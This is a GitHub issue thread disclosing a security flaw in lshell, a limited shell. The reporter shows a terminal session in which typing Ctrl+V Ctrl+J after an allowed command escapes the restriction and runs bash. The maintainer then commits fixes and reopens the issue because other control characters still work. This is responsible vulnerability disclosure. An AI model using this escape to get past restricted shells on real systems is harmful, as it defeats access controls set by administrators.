Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SECURITY ISSUE: Escape possible using special keys #149

Closed
Snawoot opened this issue Aug 17, 2016 · 4 comments
Closed

SECURITY ISSUE: Escape possible using special keys #149

Snawoot opened this issue Aug 17, 2016 · 4 comments
Labels

Comments

@Snawoot
Copy link

Snawoot commented Aug 17, 2016

Just type <CTRL+V><CTRL+J> after any allowed command and then type desired restricted command:

vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash

@Snawoot Snawoot changed the title SECURITY ISSUE: Escape possible by using special keys SECURITY ISSUE: Escape possible using special keys Aug 18, 2016
@ghantoos
Copy link
Owner

Hi @Snawoot!

Thanks for reporting these major security issues. I am unfortunately away from my PC until tomorrow night. I'll do my best to work on this asap.

I also saw your Debian bug reports, as I am the Debian maintainer for lshell.

Cheers!

@ghantoos
Copy link
Owner

@Snawoot can you confirm that this fixes the issue you reported? Thanks! :)

@Snawoot
Copy link
Author

Snawoot commented Aug 22, 2016

@ghantoos Fix confirmed, thank you!

ghantoos pushed a commit that referenced this issue Aug 25, 2016
…loses #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commits also corrects a previous ommited correction regarding the
control charaters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
@ghantoos
Copy link
Owner

Reopening as issue is still there, using other control characters. See #148.

@ghantoos ghantoos reopened this Aug 25, 2016
ghantoos added a commit that referenced this issue Aug 25, 2016
Closes #148, Closes #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commits also corrects a previous ommited correction regarding the
control charaters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants